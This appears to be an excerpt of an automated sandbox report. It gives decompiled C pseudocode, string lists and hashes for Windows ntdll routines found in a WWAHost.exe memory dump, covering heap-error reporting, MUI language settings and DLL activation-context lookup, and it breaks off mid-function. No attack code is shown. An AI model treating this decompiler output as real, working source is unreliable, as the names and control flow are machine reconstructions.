                                              • API String ID: 2994545307-0
                                              • Opcode ID: b2e39d327a4436d2e4780fe46fb852ac39c7ec4131807e9542809468ece265d1
                                              • Instruction ID: bd85f93994a4777efc6dc7b4c1595ae25f85cac7a0f342b9ac20fe68d541031b
                                              • Opcode Fuzzy Hash: b2e39d327a4436d2e4780fe46fb852ac39c7ec4131807e9542809468ece265d1
                                              • Instruction Fuzzy Hash: E2B09B719015C5D5FA11E7694608717795477D0745F56C156D1020681A4778C091F5F5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              • The resource is owned shared by %d threads, xrefs: 03A0B37E
                                              • The critical section is owned by thread %p., xrefs: 03A0B3B9
                                              • *** enter .exr %p for the exception record, xrefs: 03A0B4F1
                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 03A0B314
                                              • *** then kb to get the faulting stack, xrefs: 03A0B51C
                                              • The resource is owned exclusively by thread %p, xrefs: 03A0B374
                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 03A0B2DC
                                              • read from, xrefs: 03A0B4AD, 03A0B4B2
                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 03A0B476
                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 03A0B39B
                                              • <unknown>, xrefs: 03A0B27E, 03A0B2D1, 03A0B350, 03A0B399, 03A0B417, 03A0B48E
                                              • Go determine why that thread has not released the critical section., xrefs: 03A0B3C5
                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 03A0B47D
                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 03A0B305
                                              • an invalid address, %p, xrefs: 03A0B4CF
                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 03A0B2F3
                                              • The instruction at %p referenced memory at %p., xrefs: 03A0B432
                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 03A0B53F
                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03A0B3D6
                                              • write to, xrefs: 03A0B4A6
                                              • This failed because of error %Ix., xrefs: 03A0B446
                                              • *** enter .cxr %p for the context, xrefs: 03A0B50D
                                              • *** An Access Violation occurred in %ws:%s, xrefs: 03A0B48F
                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 03A0B323
                                              • a NULL pointer, xrefs: 03A0B4E0
                                              • *** Inpage error in %ws:%s, xrefs: 03A0B418
                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 03A0B352
                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 03A0B484
                                              • The instruction at %p tried to %s , xrefs: 03A0B4B6
                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03A0B38F
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                              • API String ID: 0-108210295
                                              • Opcode ID: 9dfc65ff1d151a91be903cdbf834ce1df4c1305775ba11af52d1a8a75ba4f2fa
                                              • Instruction ID: 19addf85b95d92484b0348659e7021bdaf3f531f30f8ca09f43a75e618512352
                                              • Opcode Fuzzy Hash: 9dfc65ff1d151a91be903cdbf834ce1df4c1305775ba11af52d1a8a75ba4f2fa
                                              • Instruction Fuzzy Hash: DD81127DA41310FFCB22DB19AD95D6F3B35AF9AB55B05008AF0142F193D3A2C511DAB2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 44%
                                              			E03A11C06() {
                                              				signed int _t27;
                                              				char* _t104;
                                              				char* _t105;
                                              				intOrPtr _t113;
                                              				intOrPtr _t115;
                                              				intOrPtr _t117;
                                              				intOrPtr _t119;
                                              				intOrPtr _t120;
                                              
                                              				_t105 = 0x39348a4;
                                              				_t104 = "HEAP: ";
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              					_push(_t104);
                                              					E0395B150();
                                              				} else {
                                              					E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              				}
                                              				_push( *0x3a4589c);
                                              				E0395B150("Heap error detected at %p (heap handle %p)\n",  *0x3a458a0);
                                              				_t27 =  *0x3a45898; // 0x0
                                              				if(_t27 <= 0xf) {
                                              					switch( *((intOrPtr*)(_t27 * 4 +  &M03A11E96))) {
                                              						case 0:
                                              							_t105 = "heap_failure_internal";
                                              							goto L21;
                                              						case 1:
                                              							goto L21;
                                              						case 2:
                                              							goto L21;
                                              						case 3:
                                              							goto L21;
                                              						case 4:
                                              							goto L21;
                                              						case 5:
                                              							goto L21;
                                              						case 6:
                                              							goto L21;
                                              						case 7:
                                              							goto L21;
                                              						case 8:
                                              							goto L21;
                                              						case 9:
                                              							goto L21;
                                              						case 0xa:
                                              							goto L21;
                                              						case 0xb:
                                              							goto L21;
                                              						case 0xc:
                                              							goto L21;
                                              						case 0xd:
                                              							goto L21;
                                              						case 0xe:
                                              							goto L21;
                                              						case 0xf:
                                              							goto L21;
                                              					}
                                              				}
                                              				L21:
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              					_push(_t104);
                                              					E0395B150();
                                              				} else {
                                              					E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              				}
                                              				_push(_t105);
                                              				E0395B150("Error code: %d - %s\n",  *0x3a45898);
                                              				_t113 =  *0x3a458a4; // 0x0
                                              				if(_t113 != 0) {
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E0395B150();
                                              					} else {
                                              						E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					E0395B150("Parameter1: %p\n",  *0x3a458a4);
                                              				}
                                              				_t115 =  *0x3a458a8; // 0x0
                                              				if(_t115 != 0) {
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E0395B150();
                                              					} else {
                                              						E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					E0395B150("Parameter2: %p\n",  *0x3a458a8);
                                              				}
                                              				_t117 =  *0x3a458ac; // 0x0
                                              				if(_t117 != 0) {
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E0395B150();
                                              					} else {
                                              						E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					E0395B150("Parameter3: %p\n",  *0x3a458ac);
                                              				}
                                              				_t119 =  *0x3a458b0; // 0x0
                                              				if(_t119 != 0) {
                                              					L41:
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E0395B150();
                                              					} else {
                                              						E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					_push( *0x3a458b4);
                                              					E0395B150("Last known valid blocks: before - %p, after - %p\n",  *0x3a458b0);
                                              				} else {
                                              					_t120 =  *0x3a458b4; // 0x0
                                              					if(_t120 != 0) {
                                              						goto L41;
                                              					}
                                              				}
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              					_push(_t104);
                                              					E0395B150();
                                              				} else {
                                              					E0395B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              				}
                                              				return E0395B150("Stack trace available at %p\n", 0x3a458c0);
                                              			}












                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                              • API String ID: 0-2897834094
                                              • Opcode ID: 42c604a1c08dfc7dc1bf905db1b17ede9cd76b2b6f7e39dee1a07da9f6428211
                                              • Instruction ID: e12ede9f4bdd493a8afd0a174dffc3fac90dc8210c575c09937cd53f80900b34
                                              • Opcode Fuzzy Hash: 42c604a1c08dfc7dc1bf905db1b17ede9cd76b2b6f7e39dee1a07da9f6428211
                                              • Instruction Fuzzy Hash: 9961E43AE11248DFD651EB98D489D3573F4FB85930B09806FFA0A5F741D6349CA18F4A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E03963D34(signed int* __ecx) {
                                              				signed int* _v8;
                                              				char _v12;
                                              				signed int* _v16;
                                              				signed int* _v20;
                                              				char _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				char _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int* _v48;
                                              				signed int* _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				char _v68;
                                              				signed int _t140;
                                              				signed int _t161;
                                              				signed int* _t236;
                                              				signed int* _t242;
                                              				signed int* _t243;
                                              				signed int* _t244;
                                              				signed int* _t245;
                                              				signed int _t255;
                                              				void* _t257;
                                              				signed int _t260;
                                              				void* _t262;
                                              				signed int _t264;
                                              				void* _t267;
                                              				signed int _t275;
                                              				signed int* _t276;
                                              				short* _t277;
                                              				signed int* _t278;
                                              				signed int* _t279;
                                              				signed int* _t280;
                                              				short* _t281;
                                              				signed int* _t282;
                                              				short* _t283;
                                              				signed int* _t284;
                                              				void* _t285;
                                              
                                              				_v60 = _v60 | 0xffffffff;
                                              				_t280 = 0;
                                              				_t242 = __ecx;
                                              				_v52 = __ecx;
                                              				_v8 = 0;
                                              				_v20 = 0;
                                              				_v40 = 0;
                                              				_v28 = 0;
                                              				_v32 = 0;
                                              				_v44 = 0;
                                              				_v56 = 0;
                                              				_t275 = 0;
                                              				_v16 = 0;
                                              				if(__ecx == 0) {
                                              					_t280 = 0xc000000d;
                                              					_t140 = 0;
                                              					L50:
                                              					 *_t242 =  *_t242 | 0x00000800;
                                              					_t242[0x13] = _t140;
                                              					_t242[0x16] = _v40;
                                              					_t242[0x18] = _v28;
                                              					_t242[0x14] = _v32;
                                              					_t242[0x17] = _t275;
                                              					_t242[0x15] = _v44;
                                              					_t242[0x11] = _v56;
                                              					_t242[0x12] = _v60;
                                              					return _t280;
                                              				}
                                              				if(E03961B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                              					_v56 = 1;
                                              					if(_v8 != 0) {
                                              						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                              					}
                                              					_v8 = _t280;
                                              				}
                                              				if(E03961B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                              					_v60 =  *_v8;
                                              					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                              					_v8 = _t280;
                                              				}
                                              				if(E03961B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                              					L16:
                                              					if(E03961B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                              						L28:
                                              						if(E03961B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                              							L46:
                                              							_t275 = _v16;
                                              							L47:
                                              							_t161 = 0;
                                              							L48:
                                              							if(_v8 != 0) {
                                              								L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                              							}
                                              							_t140 = _v20;
                                              							if(_t140 != 0) {
                                              								if(_t275 != 0) {
                                              									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                              									_t275 = 0;
                                              									_v28 = 0;
                                              									_t140 = _v20;
                                              								}
                                              							}
                                              							goto L50;
                                              						}
                                              						_t167 = _v12;
                                              						_t255 = _v12 + 4;
                                              						_v44 = _t255;
                                              						if(_t255 == 0) {
                                              							_t276 = _t280;
                                              							_v32 = _t280;
                                              						} else {
                                              							_t276 = L03974620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                              							_t167 = _v12;
                                              							_v32 = _t276;
                                              						}
                                              						if(_t276 == 0) {
                                              							_v44 = _t280;
                                              							_t280 = 0xc0000017;
                                              							goto L46;
                                              						} else {
                                              							E0399F3E0(_t276, _v8, _t167);
                                              							_v48 = _t276;
                                              							_t277 = E039A1370(_t276, 0x3934e90);
                                              							_pop(_t257);
                                              							if(_t277 == 0) {
                                              								L38:
                                              								_t170 = _v48;
                                              								if( *_v48 != 0) {
                                              									E0399BB40(0,  &_v68, _t170);
                                              									if(L039643C0( &_v68,  &_v24) != 0) {
                                              										_t280 =  &(_t280[0]);
                                              									}
                                              								}
                                              								if(_t280 == 0) {
                                              									_t280 = 0;
                                              									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                              									_v44 = 0;
                                              									_v32 = 0;
                                              								} else {
                                              									_t280 = 0;
                                              								}
                                              								_t174 = _v8;
                                              								if(_v8 != 0) {
                                              									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                              								}
                                              								_v8 = _t280;
                                              								goto L46;
                                              							}
                                              							_t243 = _v48;
                                              							do {
                                              								 *_t277 = 0;
                                              								_t278 = _t277 + 2;
                                              								E0399BB40(_t257,  &_v68, _t243);
                                              								if(L039643C0( &_v68,  &_v24) != 0) {
                                              									_t280 =  &(_t280[0]);
                                              								}
                                              								_t243 = _t278;
                                              								_t277 = E039A1370(_t278, 0x3934e90);
                                              								_pop(_t257);
                                              							} while (_t277 != 0);
                                              							_v48 = _t243;
                                              							_t242 = _v52;
                                              							goto L38;
                                              						}
                                              					}
                                              					_t191 = _v12;
                                              					_t260 = _v12 + 4;
                                              					_v28 = _t260;
                                              					if(_t260 == 0) {
                                              						_t275 = _t280;
                                              						_v16 = _t280;
                                              					} else {
                                              						_t275 = L03974620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                              						_t191 = _v12;
                                              						_v16 = _t275;
                                              					}
                                              					if(_t275 == 0) {
                                              						_v28 = _t280;
                                              						_t280 = 0xc0000017;
                                              						goto L47;
                                              					} else {
                                              						E0399F3E0(_t275, _v8, _t191);
                                              						_t285 = _t285 + 0xc;
                                              						_v48 = _t275;
                                              						_t279 = _t280;
                                              						_t281 = E039A1370(_v16, 0x3934e90);
                                              						_pop(_t262);
                                              						if(_t281 != 0) {
                                              							_t244 = _v48;
                                              							do {
                                              								 *_t281 = 0;
                                              								_t282 = _t281 + 2;
                                              								E0399BB40(_t262,  &_v68, _t244);
                                              								if(L039643C0( &_v68,  &_v24) != 0) {
                                              									_t279 =  &(_t279[0]);
                                              								}
                                              								_t244 = _t282;
                                              								_t281 = E039A1370(_t282, 0x3934e90);
                                              								_pop(_t262);
                                              							} while (_t281 != 0);
                                              							_v48 = _t244;
                                              							_t242 = _v52;
                                              						}
                                              						_t201 = _v48;
                                              						_t280 = 0;
                                              						if( *_v48 != 0) {
                                              							E0399BB40(_t262,  &_v68, _t201);
                                              							if(L039643C0( &_v68,  &_v24) != 0) {
                                              								_t279 =  &(_t279[0]);
                                              							}
                                              						}
                                              						if(_t279 == 0) {
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                              							_v28 = _t280;
                                              							_v16 = _t280;
                                              						}
                                              						_t202 = _v8;
                                              						if(_v8 != 0) {
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                              						}
                                              						_v8 = _t280;
                                              						goto L28;
                                              					}
                                              				}
                                              				_t214 = _v12;
                                              				_t264 = _v12 + 4;
                                              				_v40 = _t264;
                                              				if(_t264 == 0) {
                                              					_v20 = _t280;
                                              				} else {
                                              					_t236 = L03974620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                              					_t280 = _t236;
                                              					_v20 = _t236;
                                              					_t214 = _v12;
                                              				}
                                              				if(_t280 == 0) {
                                              					_t161 = 0;
                                              					_t280 = 0xc0000017;
                                              					_v40 = 0;
                                              					goto L48;
                                              				} else {
                                              					E0399F3E0(_t280, _v8, _t214);
                                              					_t285 = _t285 + 0xc;
                                              					_v48 = _t280;
                                              					_t283 = E039A1370(_t280, 0x3934e90);
                                              					_pop(_t267);
                                              					if(_t283 != 0) {
                                              						_t245 = _v48;
                                              						do {
                                              							 *_t283 = 0;
                                              							_t284 = _t283 + 2;
                                              							E0399BB40(_t267,  &_v68, _t245);
                                              							if(L039643C0( &_v68,  &_v24) != 0) {
                                              								_t275 = _t275 + 1;
                                              							}
                                              							_t245 = _t284;
                                              							_t283 = E039A1370(_t284, 0x3934e90);
                                              							_pop(_t267);
                                              						} while (_t283 != 0);
                                              						_v48 = _t245;
                                              						_t242 = _v52;
                                              					}
                                              					_t224 = _v48;
                                              					_t280 = 0;
                                              					if( *_v48 != 0) {
                                              						E0399BB40(_t267,  &_v68, _t224);
                                              						if(L039643C0( &_v68,  &_v24) != 0) {
                                              							_t275 = _t275 + 1;
                                              						}
                                              					}
                                              					if(_t275 == 0) {
                                              						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                              						_v40 = _t280;
                                              						_v20 = _t280;
                                              					}
                                              					_t225 = _v8;
                                              					if(_v8 != 0) {
                                              						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                              					}
                                              					_v8 = _t280;
                                              					goto L16;
                                              				}
                                              			}

                                              Strings
                                              • Kernel-MUI-Language-Disallowed, xrefs: 03963E97
                                              • WindowsExcludedProcs, xrefs: 03963D6F
                                              • Kernel-MUI-Language-Allowed, xrefs: 03963DC0
                                              • Kernel-MUI-Number-Allowed, xrefs: 03963D8C
                                              • Kernel-MUI-Language-SKU, xrefs: 03963F70
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: a4fa8b41d74b72cf8165534ea19b274e80225740f40b86bd629b21595bdcf046
                                              • Instruction ID: 47fc92ccd8eda35e7aec8e78f4fdb465c638b1cb71ea0198f9dd54b64cdd0980
                                              • Opcode Fuzzy Hash: a4fa8b41d74b72cf8165534ea19b274e80225740f40b86bd629b21595bdcf046
                                              • Instruction Fuzzy Hash: 15F16B76D01619EFCB11DFD9C980AEEBBBDFF48690F15006AE405AB250E7349E01CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 44%
                                              			E03988E00(void* __ecx) {
                                              				signed int _v8;
                                              				char _v12;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr* _t32;
                                              				intOrPtr _t35;
                                              				intOrPtr _t43;
                                              				void* _t46;
                                              				intOrPtr _t47;
                                              				void* _t48;
                                              				signed int _t49;
                                              				void* _t50;
                                              				intOrPtr* _t51;
                                              				signed int _t52;
                                              				void* _t53;
                                              				intOrPtr _t55;
                                              
                                              				_v8 =  *0x3a4d360 ^ _t52;
                                              				_t49 = 0;
                                              				_t48 = __ecx;
                                              				_t55 =  *0x3a48464; // 0x761c0110
                                              				if(_t55 == 0) {
                                              					L9:
                                              					if( !_t49 >= 0) {
                                              						if(( *0x3a45780 & 0x00000003) != 0) {
                                              							E039D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                              						}
                                              						if(( *0x3a45780 & 0x00000010) != 0) {
                                              							asm("int3");
                                              						}
                                              					}
                                              					return E0399B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                              				}
                                              				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                              				_t43 =  *0x3a47984; // 0xb52ac8
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                              					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                              					if(_t48 == _t43) {
                                              						_t50 = 0x5c;
                                              						if( *_t32 == _t50) {
                                              							_t46 = 0x3f;
                                              							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                              								_t32 = _t32 + 8;
                                              							}
                                              						}
                                              					}
                                              					_t51 =  *0x3a48464; // 0x761c0110
                                              					 *0x3a4b1e0(_t47, _t32,  &_v12);
                                              					_t49 =  *_t51();
                                              					if(_t49 >= 0) {
                                              						L8:
                                              						_t35 = _v12;
                                              						if(_t35 != 0) {
                                              							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                              								E03989B10( *((intOrPtr*)(_t48 + 0x48)));
                                              								_t35 = _v12;
                                              							}
                                              							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                              						}
                                              						goto L9;
                                              					}
                                              					if(_t49 != 0xc000008a) {
                                              						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                              							if(_t49 != 0xc00000bb) {
                                              								goto L8;
                                              							}
                                              						}
                                              					}
                                              					if(( *0x3a45780 & 0x00000005) != 0) {
                                              						_push(_t49);
                                              						E039D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                              						_t53 = _t53 + 0x1c;
                                              					}
                                              					_t49 = 0;
                                              					goto L8;
                                              				} else {
                                              					goto L9;
                                              				}
                                              			}

                                              Strings
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 039C933B, 039C9367
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 039C932A
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 039C9357
                                              • LdrpFindDllActivationContext, xrefs: 039C9331, 039C935D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 0-3779518884
                                              • Opcode ID: 5b823902074167648d0b739c96f4aa9eadb86c80a96d15dc2581c949d8590fb1
                                              • Instruction ID: 02e491856b58e407457f014ed4b2b6806f3f181bd1873a71d89c3a1896e8b46a
                                              • Opcode Fuzzy Hash: 5b823902074167648d0b739c96f4aa9eadb86c80a96d15dc2581c949d8590fb1
                                              • Instruction Fuzzy Hash: 32411772A087199FDF35FB18884DA39B2ADEFC5384F8D45A9D80957153E760AC80C3A3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E03968794(void* __ecx) {
                                              				signed int _v0;
                                              				char _v8;
                                              				signed int _v12;
                                              				void* _v16;
                                              				signed int _v20;
                                              				intOrPtr _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v40;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				intOrPtr* _t77;
                                              				signed int _t80;
                                              				signed char _t81;
                                              				signed int _t87;
                                              				signed int _t91;
                                              				void* _t92;
                                              				void* _t94;
                                              				signed int _t95;
                                              				signed int _t103;
                                              				signed int _t105;
                                              				signed int _t110;
                                              				signed int _t118;
                                              				intOrPtr* _t121;
                                              				intOrPtr _t122;
                                              				signed int _t125;
                                              				signed int _t129;
                                              				signed int _t131;
                                              				signed int _t134;
                                              				signed int _t136;
                                              				signed int _t143;
                                              				signed int* _t147;
                                              				signed int _t151;
                                              				void* _t153;
                                              				signed int* _t157;
                                              				signed int _t159;
                                              				signed int _t161;
                                              				signed int _t166;
                                              				signed int _t168;
                                              
                                              				_push(__ecx);
                                              				_t153 = __ecx;
                                              				_t159 = 0;
                                              				_t121 = __ecx + 0x3c;
                                              				if( *_t121 == 0) {
                                              					L2:
                                              					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                              					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                              						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                              						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                              						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                              							L6:
                                              							if(E0396934A() != 0) {
                                              								_t159 = E039DA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                              								__eflags = _t159;
                                              								if(_t159 < 0) {
                                              									_t81 =  *0x3a45780; // 0x0
                                              									__eflags = _t81 & 0x00000003;
                                              									if((_t81 & 0x00000003) != 0) {
                                              										_push(_t159);
                                              										E039D5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                              										_t81 =  *0x3a45780; // 0x0
                                              									}
                                              									__eflags = _t81 & 0x00000010;
                                              									if((_t81 & 0x00000010) != 0) {
                                              										asm("int3");
                                              									}
                                              								}
                                              							}
                                              						} else {
                                              							_t159 = E0396849B(0, _t122, _t153, _t159, _t180);
                                              							if(_t159 >= 0) {
                                              								goto L6;
                                              							}
                                              						}
                                              						_t80 = _t159;
                                              						goto L8;
                                              					} else {
                                              						_t125 = 0x13;
                                              						asm("int 0x29");
                                              						_push(0);
                                              						_push(_t159);
                                              						_t161 = _t125;
                                              						_t87 =  *( *[fs:0x30] + 0x1e8);
                                              						_t143 = 0;
                                              						_v40 = _t161;
                                              						_t118 = 0;
                                              						_push(_t153);
                                              						__eflags = _t87;
                                              						if(_t87 != 0) {
